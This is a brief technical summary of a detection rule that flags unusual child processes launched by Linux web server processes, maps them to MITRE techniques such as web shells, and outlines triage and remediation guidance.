Technical summary: This rule uses the new_terms detection type to identify unusual child process executions initiated by Linux web server processes. It monitors process.executable and process.command_line for child processes spawned by parent web server processes (e.g., nginx, apache, php-fpm, ruby, Python app servers) and flags deviations from established baselines within a 7-day history window. The detection relies on a broad set of parent/command criteria and excludes common benign commands to reduce noise. When triggered, it maps to MITRE techniques T1505.003 Web Shell (Persistence via server software), T1059 Unix Shell (Execution), T1071 Application Layer Protocol (C2 over HTTP/HTTPS), and T1190 Exploit Public-Facing Application (Initial Access). The rule includes an investigation guide with triage steps, false positive considerations, and remediation guidance such as containment, artifact collection, credential rotation, and hardening of the web service environment.